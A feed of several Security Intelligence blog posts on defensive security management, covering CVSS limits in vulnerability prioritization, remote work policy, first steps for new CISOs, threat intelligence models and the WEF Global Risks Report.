The post Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks appeared first on Security Intelligence.

Author: John Zorabedian

Incident Management, Incident Response (IR), Penetration Testing, Software & App Vulnerabilities, Vulnerability, Vulnerability Management, X-Force,

Calling Into Question the CVSS

For almost 15 years now, companies have been using the Common Vulnerability Scoring System (CVSS) to determine the criticality of security vulnerabilities. Ten is the highest score, meaning the most severe, while zero is the lowest. Over time, the CVSS has become something of a de facto industry standard used by most major vendors as well as the National Vulnerability Database (NVD).

CVSS scores were designed to measure the level of severity of an identified vulnerability in relation to where that vulnerability was found. Many organizations have used the scores to prioritize which vulnerabilities to fix first, which is an essential component of vulnerability management. However, the CVSS was never meant to be used on its own for prioritization, and such use has created many debates within the security community, particularly where those assessing risk require more context about vulnerabilities than a technical score.

The CVSS Wasn’t Designed to Measure Risk

In December 2018, the Software Engineering Institute at Carnegie Mellon published a report titled “Towards Improving CVSS.” The authors explain how the CVSS is being misused as a risk score and dive into why the output can be unreliable when vulnerability-fix prioritization is based solely on the CVSS. A few excerpts from the report align with some of the existing lines of thought about why the CVSS alone is not enough for vulnerability prioritization.

For example, some organizations use the CVSS as the sole driver for prioritizing vulnerability patching policies, while what they truly need is to work on the bigger risk picture, of which the CVSS is but one component of many.

To that effect, the report states, “CVSS is designed to identify the technical severity of a vulnerability. What people seem to want to know, instead, is the risk a vulnerability or flaw poses to them, or how quickly they should respond to a vulnerability. If so, then either CVSS needs to change or the community needs a new system.”

For the most part, IBM Security’s team of veteran hackers, X-Force Red, agrees with that conclusion. A new system is needed, and it should incorporate more risk-focused contextual information when prioritizing which vulnerabilities to fix first. However, it’s important to keep in mind that the CVSS was never meant to measure risk to a certain organization; it was meant to measure the severity of the vulnerability. As such, upending the scoring system isn’t the solution. Instead, we need a new method for prioritizing vulnerabilities that incorporates the CVSS and contextual factors specific to each organization’s environment.

The Components of the CVSS

The CVSS Specification Document states that the CVSS score is composed of three metric groups: base, temporal and environmental. Most published CVSS scores report only the base metric group, which describes characteristics of the vulnerability that are constant over time and across environments. The temporal group covers exploit code maturity, remediation level and report confidence, factors that change over time but are independent of any particular environment. Finally, the environmental group can only be assessed with knowledge of the environment in which the vulnerable system resides.

The researcher who scores a discovered vulnerability will often leave the environmental metrics undefined because he or she is not familiar with each individual environment, and an undefined environmental metric leaves the base score unchanged. For the environmental score to be taken into account, a security analyst in each affected organization would need to assess his or her own environment and rescore the vulnerability. Because many organizations have limited resources, time and skill sets, having an analyst who can do this is unlikely.

The three metric groups of the CVSS do not account for the risk posed based on the business value of an asset, nor were they ever supposed to. The CVSS is a severity rating, not a risk score. The environmental score can modify the base score by taking into consideration local mitigation factors and configuration details. It can also adjust the impact to an asset’s confidentiality, integrity and availability (CIA) if the vulnerability were exploited. However, it is still a measure of severity and does not consider the value of the exposed asset to the organization, which is a key risk factor.

Contextual Data the CVSS Does Not Consider

For example, consider two different vulnerabilities. One vulnerability has a low impact on the availability of web servers; the other exposes users’ email addresses (low confidentiality). Both could easily have the same CVSS base score of 5.3, but the availability issue may receive an environmental score of 5.8 because it affects a customer service portal and management considers the availability requirement to be high.

Even if the confidentiality issue received a similar adjustment, there is no metric to measure the impact General Data Protection Regulation (GDPR) requirements may add to the risk of exposing customer data, which significantly increases the value of the email addresses. The report backs up this argument, stating: “We have no evidence that CVSS accounts for any of the following: the type of data an information system (typically) processes, the proper operation of the system, the context in which the vulnerable software is used, or the material consequences of an attack.”

The report also highlights that the CVSS does not consider relationships between vulnerabilities that allow an attacker to pivot or escalate privileges, nor security issues that are not strictly defined as vulnerabilities, such as misconfigurations. All of these play a role in evaluating risk status and response prioritization.

“In general, severity should only be a part of vulnerability response prioritization,” the report notes. “One might also consider exploit likelihood or whether exploits are publicly available. The Exploit Code Maturity vector (in Temporal Metrics) attempts to address exploit likelihood, but the default value assumes widespread exploitation, which is not realistic.”

The temporal metrics, however, are only designed to lower the base score and are rarely updated, if published at all. Asset value and exploitation are common risk factors and must be considered when prioritizing vulnerabilities.

The Subjective Angle of the CVSS

At X-Force Red, we are hired to break into organizations to uncover risky vulnerabilities that criminal attackers may use for their gain. Our team works with a plethora of vulnerabilities on a daily basis, and we do agree that while the CVSS has its role, it should not be the only factor in determining how to prioritize vulnerabilities. Two of the factors that need a more objective metric are the potential for exploitation and the criticality of the asset.

Let’s consider the fact that CVSS scores are assigned by vendors or researchers at a point in time and rarely rescored as circumstances change. For example, the temporal metric, if considered at all, is based on exploitation that is known at the time. As a result, CVSS scores can be more subjective and may not consider critical context around the assets the vulnerability is exposing, or whether criminals are actively weaponizing the vulnerability.

When it comes to using the CVSS to prioritize response to vulnerabilities, our X-Force Red hackers have seen time and time again vulnerabilities with CVSS scores of 10 bumped to the top of the priority list even though the assets they could affect would only cause minimal impact to the business if they were compromised. High scores were also attributed to vulnerabilities even when criminals were not exploiting them in the wild at that time.

Meanwhile, vulnerabilities with CVSS scores of 5 sit lower on the priority list even though they could expose high-value assets and are being actively weaponized by criminals. As a result, the vulnerability scored as 10 gets fixed first, leaving criminals ample time to exploit the more detrimental issues that scored a mere 5.


Figure 1: This graphic shows that even though the vulnerability MS17-010 has the most correlated exploits (41), it still sits lower on the priority list because it has a lower CVSS score. Meanwhile, the vulnerability at the top of the list has fewer correlated exploits yet has a CVSS score of 10.

Striking a New Balance With Vulnerability Prioritization

At X-Force Red, we believe vulnerabilities should be ranked based on the importance of the exposed asset to the organization and whether the vulnerability is being weaponized by criminals.

To help security professionals prioritize remediation, our team built a proprietary algorithm, which is part of X-Force Red’s Vulnerability Management Services (VMS). This algorithm automatically prioritizes vulnerabilities considering those contextual factors — asset value and whether the vulnerability is being weaponized — in addition to the CVSS score.

With X-Force Red Vulnerability Management Services, the chart above would look like this:



Figure 2: Vulnerability prioritization matrix when using X-Force Red’s VMS. Notice the vulnerability with the most correlated exploits — MS17-010 — is at the top even though the CVSS score is lower than others on the list.

Consider the risk equation, which, depending on who you ask, may vary. While the classic risk calculation is risk = likelihood x impact, some risk experts describe it as:

Risk = threat + vulnerability + asset of value.

Without a threat exploiting a vulnerability, the risk should definitely be scored lower. If the vulnerability doesn’t affect an asset of value, it should not rank highest on the prioritization list until that situation changes.

By considering the impact to the business if the exposed asset were compromised, and whether the vulnerability is being exploited, vulnerabilities could be prioritized based on the actual risk to critical assets, data or business operations. It is this sort of context we would like to bring into the vulnerability factor of the overall risk equation.

Learn more about X-Force Red Vulnerability Management Services

The post Calling Into Question the CVSS appeared first on Security Intelligence.

Author: Abby Ross

Data Breach, Data Protection, Endpoint, Endpoint Protection, General Data Protection Regulation (GDPR), Incident Response (IR), Mobile Security, Network Security, regulatory compliance, Remote Access, Security Strategy,

Employees Are Working From Home — Do You Know Where Your Remote Work Policy Is?

The remote work trend is here to stay — and it’s a growing phenomenon.

Nearly two-thirds (63 percent) of companies have employees who work remotely, yet more than half of those companies (57 percent) do not have a remote work policy, according to a 2018 report from the freelancing website Upwork. What’s more, many of the companies that do have a remote work policy said it hasn’t been updated in the past five years or has become more lenient over that time.

Remote work security is a lot like mobile security, and the work-at-home trend is a lot like the bring-your-own-device (BYOD) trend. You likely have a policy that covers mobile security. You need one that covers remote work.

What Could Go Wrong?

The elevated exposure associated with remote work is undeniable. In fact, it’s not even a controversial point. According to Shred-it, 86 percent of C-level executives believe that the risk of a data breach is higher when employees work remotely. Additionally, CybSafe reported that one-third of U.K. businesses have suffered a data breach because of remote work in the past 12 months.

All of those numbers make sense. Simply working outside the office comes with inherent risks. Remote workers are more likely to connect via insecure WiFi, either at home or while working in public spaces such as coffee shops. A study by OneLogin even found that more than half of remote workers spend up to one day per week connected to unsecured networks.

Sensitive conversations — or talk that could help threat actors do their work — involving remote workers are more likely to take place in writing (via chat or email) than in person, which creates a record that could be accessed by cybercriminals. Work-from-home employees are also more likely to mix professional and personal equipment, software, data and online activity. That means threat actors could more easily breach personal consumer hardware and software as an entry point into company networks. In other words, hacking a remote worker may offer a higher payoff than hacking an in-office employee.

Furthermore, remote, freelance and contract workers are more likely to use their own equipment and perform their own IT tasks than in-office staff. And most remote workers are neither experts in choosing secure hardware nor skilled in the complexities of IT security. They’re also more vulnerable to hardware theft, shoulder surfing and other risks.

Don’t Forget About Compliance

Beyond the obvious security risks, remote work policies now carry significant regulatory compliance weight. The General Data Protection Regulation (GDPR) led the way, California followed, and soon many U.S. states will have strong regulations around security and privacy. Yet many of the remote work policies currently in place were created before the GDPR even started making headlines.

A good remote work policy covers a broad range of categories, from employment rules to expense reporting to legal obligations. But the data security provisions are probably the most important. And because the security and regulatory landscapes — as well as attitudes and demands around remote work — keep changing, your company’s remote work policy should keep changing too.

Components of a Good Remote Work Policy

Clearly, it’s important to create a good remote work policy if you don’t have one — or update the one you’ve got to reflect current realities and best practices. But what exactly makes a good policy?

First, create a detailed plan for communication and training related to remote workers, and specify this plan in the policy. Clarify that the remote work policy applies to all workers, even if they do work at home one hour a month. Keep in mind the differences (legal and otherwise) between permanent, full-time employees on the one hand and contract, freelance, temporary or contingent workers on the other. Your policy is one tool for the company to help employees boost security in their homes, which is always a good idea.

Next, align the policy with remote work infrastructure and software. Be clear about rules for company-owned equipment. List all user tools (e.g., cloud document platforms, workgroup communication, video conferencing, project management, etc.) so that remote and in-office employees are all on the same page — literally — and using the same approved and security-monitored tools.

You’ll then want to draft a notification process for security incidents and include the steps each employee must take in the event of a breach. Include clear actions to keep operating systems, applications, certificates, and security and networking software up to date. Include all applicable in-office rules, such as the password policy and other security-related rules. It’s also important to make remote work policies compatible with employee contracts — i.e., make sure overlapping or contradicting areas are addressed.

Lastly, make sure you plan to monitor policy adoption and adherence. Learn from security successes and failures and keep the policy flexible. Importantly, update the remote work policy frequently by setting a schedule for reviewing it on a regular basis.

Address Your Remote Security Gap

The bottom line is that the reality of remote work extends the enterprise attack surface to include employees’ homes. It’s vital to address this gaping hole with a clear, up-to-date remote work policy that is consistently monitored and enforced.

The post Employees Are Working From Home — Do You Know Where Your Remote Work Policy Is? appeared first on Security Intelligence.

Author: Mike Elgan

Business Continuity, Career, Chief Information Security Officer (CISO), CISO, Endpoint Protection, Executives, Incident Response (IR), Incident Response Plan, IT Infrastructure, Log Management, Risk Management, Security Awareness, Security Information and Event Management (SIEM), Security Leadership, Security Management, Security Training, Skills Gap,

6 Steps Every New CISO Should Take to Set Their Organization Up for Success

Congrats! You’ve landed a new job as a chief information security officer (CISO). Now where do you start?

With some figures putting the typical CISO tenure at just around two years, it’s clear turnover in this role is high. According to a Ponemon Institute study sponsored by Opus, 44 percent of CISOs surveyed said they plan to make a lateral move in their organization outside of IT security, and 40 percent said they expect to change careers. All of this considered, the window of time to make a mark as an effective security leader is short — and, in turn, stressful.

What are some best practices for getting started on the path to success in a new security management position? What do you need to do, who do you need to talk to, and what are the first actions you need to take to make an immediate impact and set yourself up for future wins?

Here are six steps to help you get started in a new security executive role.

1. Take Stock of Technology

One of the most important steps you will take in the first few days is reviewing the IT infrastructure of your new company. How are firewalls and servers configured? How many different endpoints connect to the network? What other technology is in place?

According to CSO, you should start by taking stock of which incident prevention security controls are preventing and reporting on malicious activity. You should also determine which security control management consoles, security information and event management (SIEM) tools, and log management solutions are collecting logs and alerts.

Understanding your systems and defenses is priority No. 1 because knowing what your new organization has in place — and where you may need to make additions and changes — will inform the next steps in your first few months in the CISO role.

2. Assess Your Processes

After gaining a comprehensive view into the technology that is in place, it is time to review and evaluate the processes in place for security. Is there an incident response (IR) plan in place? For 77 percent of organizations, the answer is no. Is the IR plan written and tested? What about awareness training? Is it done monthly? Annually? This information will give you a clearer picture of how the company has prioritized security in the past — and an idea of where it needs to go in the future.

This is also the time to poke holes in policies and standards that do not have formal processes attached, and develop and define them to be more effective. Clear, well-defined processes minimize confusion and chaos, and ensure your organization can comply with the policies you want to enforce.

3. Build Out Your Team

Whether you are utilizing existing employees or hiring new team members, building your security team is an immediate priority for a new security leader, according to Dan Lohrmann, former CISO for the state of Michigan and current chief security officer and chief strategist at Security Mentor.

“Focus on talent and relationships,” Lohrmann wrote in an article for Government Technology. “Surround yourself with security pros that work well together and cover skill set weaknesses.”

Direct reports that you will be managing are the first employees you need to get to know. Have one-on-one meetings with each team member if time allows to understand their strengths, weaknesses and insights on where security strategy stands in the organization. These employees have the institutional knowledge you don’t yet have and have dealt with issues and problems already. This time can also be an opportunity to build a relationship of trust so that your direct reports know they can come to you with concerns and feedback going forward.

If you have the luxury of hiring, after getting to know the existing security team, now is the time to assess whether you are lacking certain skills and talent on your team and look to the external talent pool to add to your ranks. This may be easier said than done, since the cybersecurity skills gap has made hiring challenging in recent years.

4. Talk to Key Internal Stakeholders

You want to gain a deeper understanding of the business, its mission, its immediate priorities and its long-term goals as soon as you get in the door. The CISO role is about security and business enablement. You will be expected to protect the organization and contribute to strategic goals.

Start by meeting with executive management when possible, as well as heads of business units. Understand their goals, visions, pain points and objectives. Ask how security management can assist with all of these. Getting to know these stakeholders will be the start of what should be an ongoing relationship and conversation that will give security a strong voice in the organization.

5. Get to Know Customers

Equally important to understanding the executive vision of the company is having a solid comprehension of the people the company serves. Getting to know key customers and clients on the front lines will give you the advantage of grasping how the enterprise is viewed from the outside. The customer lens of the organization will be invaluable in positioning security as a business driver instead of a hindrance.

6. Start Thinking About Your Budget

Gartner predicted that companies would spend around $96 billion on security products and services in 2018. But how can CISOs prove their investments had a measurable impact on corporate risk? It is no longer enough to simply deliver security to an organization; CISOs are also expected to demonstrate return on investment (ROI) and find ways to deliver direct business benefits.

Collecting the data, evidence and metrics that show why security investments are needed, why they are needed in the near term and what the corporate payoff will be is another essential step for new security management. Additionally, this needs to be positioned in a way that business leaders understand, which takes us back to the importance of the prior steps. Without investing time in getting to know executive management and understanding customers, you will be less equipped to make the case for budgetary dollars for security priorities down the road.

Start Your CISO Tenure Off on the Right Foot

Starting a new job in the CISO role can feel overwhelming. But the time for security to be seen as a key player — and to have a major business impact — has never been better. While there may be multiple challenges to address right out of the gate in a new organization, heed these suggestions to start making a positive impact on day one.

The post 6 Steps Every New CISO Should Take to Set Their Organization Up for Success appeared first on Security Intelligence.

Author: Joan Goodchild


It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare

When a client asked me to help build a cyberthreat intelligence program recently, I jumped at the opportunity to try something new and challenging. To begin, I set about looking for some rudimentary templates with a good outline for building a threat intelligence process, a few solid platforms that are user-friendly, the basic models for cyber intelligence collection and a good website for describing various threats an enterprise might face. This is what I found:

  1. There are a handful of rudimentary templates for building a good cyberthreat intelligence program available for free online. All of these templates leave out key pieces of information that any novice to the cyberthreat intelligence field would be required to know. Most likely, this is done to entice organizations into spending copious amounts of money on a specialist.
  2. The number of companies that specialize in the collection of cyberthreat intelligence is growing at a ludicrous rate, and they all offer something that is different, unique to certain industries, proprietary, automated via artificial intelligence (AI) and machine learning, based on pattern recognition, or equipped with behavioral analytics.
  3. The basis for all threat intelligence is heavily rooted in one of three basic models: Lockheed Martin’s Cyber Kill Chain, MITRE’s ATT&CK knowledge base and The Diamond Model of Intrusion Analysis.
  4. A small number of vendors working on cyberthreat intelligence programs or processes published a complete list of cyberthreats, primary indicators, primary actors, primary targets, typical attack vectors and potential mitigation techniques. Of that small number, very few were honest when there was no useful mitigation or defensive strategy against a particular tactic.
  5. All of the cyberthreat intelligence models in use today have gaps that organizations will need to overcome.
  6. A search within an article content engine for helpful articles with the keyword “threat intelligence” produced more than 3,000 results, and a Google search produced almost a quarter of a million. This is completely ridiculous. Considering how many organizations struggle to find experienced cyberthreat intelligence specialists to join their teams — and that cyberthreats grow by the day while mitigation strategies do not — it is not possible that there are tens of thousands of professionals or experts in this field.

It’s no wonder why organizations of all sizes in a variety of industries are struggling to build a useful cyberthreat intelligence process. For companies that are just beginning their cyberthreat intelligence journey, it can be especially difficult to sort through all these moving parts. So where do they begin, and what can the cybersecurity industry do to adapt traditional threat intelligence models to the cyber battlefield?

How to Think About Thinking

A robust threat intelligence process serves as the basis for any cyberthreat intelligence program. Here is some practical advice to help organizations plan, build and execute their program:

  1. Stop and think about the type(s) of cyberthreat intelligence data the organization needs to collect. For example, if a company manufactures athletic apparel for men and women, it is unnecessary to collect signals, geospatial data or human intelligence.
  2. How much budget is available to collect the necessary cyberthreat intelligence? For example, does the organization have the budget to hire threat hunters and build a cyberthreat intelligence program uniquely its own? What about purchasing threat intelligence as a service? Perhaps the organization should hire threat hunters and purchase a threat intelligence platform for them to use? Each of these options has a very different short- and long-term cost model.
  3. Determine where cyberthreat intelligence data should be stored once it is obtained. Does the organization plan to build a database or data lake? Does it intend to store collected threat intelligence data in the cloud? If that is indeed the intention, pause here and reread step one. Cloud providers have very different ideas about who owns data, and who is ultimately responsible for securing that data. In addition, cloud providers have a wide range of security controls — from the very robust to a complete lack thereof.
  4. How does the organization plan to use collected cyberthreat intelligence data? It can be used for strategic purposes, tactical purposes or both within an organization.
  5. Does the organization intend to share any threat intelligence data with others? If yes, then you can take the old cybersecurity industry adage “trust but verify” and throw it out. The new industry adage should be “verify and then trust.” Never assume that an ally will always be an ally.
  6. Does the organization have enough staff to spread the workload evenly, and does the organization plan to include other teams in the threat intelligence process? Organizations may find it very helpful to include other teams, either as strategic partners, such as vulnerability management, application security, infrastructure and networking, and risk management teams, or as tactical partners, such as red, blue and purple teams.

How Can We Adapt Threat Intelligence Models to the Cyber Battlefield?

As mentioned above, the threat intelligence models in use today were not designed for cyber warfare. They are typically linear models, loosely based on Carl von Clausewitz’s military strategy and tailored for warfare on a physical battlefield. It’s time for the cyberthreat intelligence community to define a new model, perhaps one that is three-dimensional, nonlinear, rooted in elementary number theory and that applies vector calculus.

Much like game theory, The Diamond Model of Intrusion Analysis is sufficient if there are two players (the victim and the adversary), but it tends to fall apart if the adversary is motivated by anything other than sociopolitical or socioeconomic payoff, if there are three or more players (e.g., where collusion, cooperation and defection of classic game theory come into play), or if the adversary is artificially intelligent. In addition, The Diamond Model of Intrusion Analysis attempts to show a stochastic model diagram but none of the complex equations behind the model — probably because that was someone’s 300-page Ph.D. thesis in applied mathematics. This is not much help to the average reader or a newcomer to the threat intelligence field.

Nearly all models published thus far are focused on either external actors or insider threats, as though a threat actor must be one or the other. None of the widely accepted models account for, or include, physical security.

While there are many good articles about reducing alert fatigue in the security operations center (SOC), orchestrating security defenses, optimizing the SOC with behavioral analysis and so on, these articles assume that the reader knows what any of these things mean and what to do about any of it. A veteran in the cyberthreat intelligence field would have doubts that behavioral analysis and pattern recognition are magic bullets for automated threat hunting, for example, since there will always be threat actors that don’t fit the pattern and whose behavior is unpredictable. Those are two of the many reasons why the fields of forensic psychology and criminal profiling were created.

Furthermore, when it comes to the collection of threat intelligence, very few articles provide insight on what exactly constitutes “useful data,” how long to store it and which types of data analysis would provide the best insight.

It would be a good idea to get the major players in the cyberthreat intelligence sector together to develop at least one new model — but preferably more than one. It’s time for industry leaders to develop new ways of classifying threats and threat actors, share what has and has not worked for them, and build more boundary connections than the typical socioeconomic or sociopolitical ones. The sector could also benefit from looking ahead at what might happen if threat actors choose to augment their crimes with algorithms and AI.

The post It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare appeared first on Security Intelligence.

Author: Kelly Ryver


Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns

Global risks are intensifying but the collective will to tackle them appears to be lacking. — The World Economic Forum’s “Global Risks Report 2019”

With the start of a new calendar year, chief information security officers (CISOs) are looking for ways to set the tone for the year and have more engaged conversations with top leadership regarding cybersecurity risks. The good news is January provided such an opportunity, but it’s not what you might expect.

Every year, the world’s elite descends on Davos, Switzerland, as part of the global gathering known as the World Economic Forum (WEF). A few weeks before they hold this event, the WEF releases its “Global Risks Report,” and this year, once again, cyber risks figured prominently. The report was based on survey responses from nearly 1,000 decision-makers from the business and government sectors, academia, nongovernmental organizations (NGOs), and other international organizations.

Cybersecurity Risks Once Again in the Top 5

The report opens with its distinctive global risks landscape diagram, and cyber-related risks fall in the top-right quadrant of global risks, both in terms of likelihood and impact. When it comes to likelihood, data fraud or theft came in fourth place after three environmental risks, with cyberattacks rounding out the top five.

When ranked by impact, cyberattacks still made it into the top 10, in seventh place, followed immediately by critical information infrastructure breakdown. The fact that data fraud or theft wasn’t in the top 10 risks by impact might indicate that markets and business leaders are more confident about the global economy’s ability to detect and respond to such an event.

This is by no means the first time that technology-related risks made it to the top of the list: Cyberattacks have appeared four times in the top five risks by likelihood since 2010 (in 2012, 2014, 2018 and 2019). However, in terms of impact, the only technology-related risk to make the top five was critical information infrastructure breakdown in 2014.

Is it symptomatic of a larger disconnect that, in the last decade, global leaders only once perceived a technology-related risk as a top-five risk in terms of impact? Do top leadership and board directors at your organization share this attitude?

A Conversation Starter for CISOs and Top Leadership

Of course, the WEF report is aimed at a global audience of business and government executives, so it might not be immediately apparent how CISOs could benefit from grabbing a copy and leafing through it. However, because technology-based risks — and more specifically, cyber-related risks — feature so prominently in the report, there is a unique opportunity to engage or re-engage top leadership and boards to discuss these issues and re-evaluate the organization’s current risk appetite. Among the topics covered in the report are many areas that CISOs should be ready to engage on, including:

  • Machine learning and artificial intelligence (AI) — How, if at all, is your organization leveraging these technologies? Is the security function engaged at the earliest part of the process to implement them?

  • Regulatory changes, such as the General Data Protection Regulation (GDPR) — Is your organization now fully compliant with the GDPR? Are there other GDPR-like regulations on the horizon that need to be on your radar?

  • Interconnectedness of cybersecurity risks — Is your organization on its way to becoming cyber resilient? How often is your organization’s resilience put to the test?

  • Quantum computing and cryptography — Who, if anyone, is keeping track of developments in quantum computing? How often is this disruptive technology being discussed, both in terms of the opportunities it presents, but also the risks to traditional cryptographic methods of protecting company secrets?

Interconnectedness Versus Resilience

If there’s one section of the report that CISOs should share with top leadership, it is the portion titled “Managing in the Age of Meltdowns” (just three pages long). As the interconnectedness of technology increases the potential for cascading failures, this section reminds us of the stakes: “When something goes wrong in a complex system, problems start popping up everywhere, and it is hard to figure out what’s happening. And tight coupling means that the emerging problems quickly spiral out of control and even small errors can cascade into massive meltdowns.”

The section covers different strategies to help deal with complex, dynamic systems and provides guidance for CISOs to review and improve the effectiveness of existing processes. Strategies include encouraging healthy skepticism and recognizing the value of clear and honest lines of reporting. CISOs should also try to “imagine failure” or, better yet, simulate a breach to practice their response. The report also reminds security leaders to perform thorough root-cause analysis, as “too often, we base decisions on predictions that are overly simplistic, missing important possible outcomes.”

Find a Rallying Point

Most CISOs know they’re more likely to be heard when aligning their messages and efforts with the concerns of top leadership. In a world of increasing global risks, security leaders must engage with all levels of the organization to truly understand what cybersecurity risks are top of mind, from the board and C-suite all the way down to entry-level analysts. Organizing around mutual concerns will help maximize security at the enterprise.

The post Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns appeared first on Security Intelligence.

Author: Christophe Veltsos